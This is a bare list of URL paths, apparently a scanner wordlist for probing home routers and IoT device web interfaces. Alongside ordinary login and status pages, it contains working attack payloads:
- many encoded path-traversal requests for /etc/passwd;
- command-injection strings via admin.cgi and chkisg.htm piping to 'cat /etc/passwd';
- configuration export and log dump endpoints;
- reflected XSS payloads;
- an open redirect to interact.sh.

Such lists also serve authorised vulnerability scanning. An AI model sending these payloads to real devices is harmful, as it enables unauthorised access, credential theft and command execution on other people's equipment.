/wlsecurity.html
/dumpmdm.cmd
/getcfg.php
/wan.htm
/cgi-bin/admin.cgi?Command=sysCommand&Cmd={{cmd}}
/cgi-bin/export-cgi?category=config&arg0=startup-config.conf
/ubus/
/js/..%2f%2f/wizard.htm
/images/..%2f%2f/wizard.htm

/update.php?jungle=id
/cgi-bin/webproc?getpage=/etc/passwd&var:page=deviceinfo
/login/../../../etc/passwd
/cgi-bin/webproc?getpage=/etc/passwd&var:language=en_us&var:page=wizardfifth
/passwordrecovered.cgi?id={{rand_base(5)}}
/uir//etc/passwd
/chkisg.htm%3FSip%3D1.1.1.1%20%7C%20cat%20%2Fetc%2Fpasswd
/../../../../../../../../../../../../etc/passwd
/action/usermanager.htm
/cgi-bin/config.exp
/api-third-party/download/extdisks../etc/passwd
/index.asp
/apply.cgi
/cgi-bin/ExportLogs.sh
/api/sys/set_passwd
/lang/log/httpd.log
/api/sys/login
/currentsetting.htm
/wizardset.htm
/easy_setup.htm
/wifi_base.shtml
/css/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd
/RST_status.htm%00currentsetting.htm
/password.cgi
/setup.cgi?next_file=debug.htm&x=currentsetting.htm
/password.htm
/htmlcode/html/indexdefault.asp
/Main_Login.asp
/login.html
/status.php
/login.sh
/cgi-bin/luci/
/sess-bin/login_session.cgi
/login.htm
/cgi-bin/MANGA/index.cgi
/login
/login/?nLang=1
/_syslog.txt
/messages
/loginLess/../../etc/passwd
/tweb/ft.php?u=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/boafrm/formWlanRedirect?redirect-url=http://interact.sh&wlan_id=1
/debuginfo.htm
/login/hostinfo.cgi
/login/hostinfo2.cgi
/<style%20onload=alert`document.domain`;>../..%2f
/rootDesc.xml
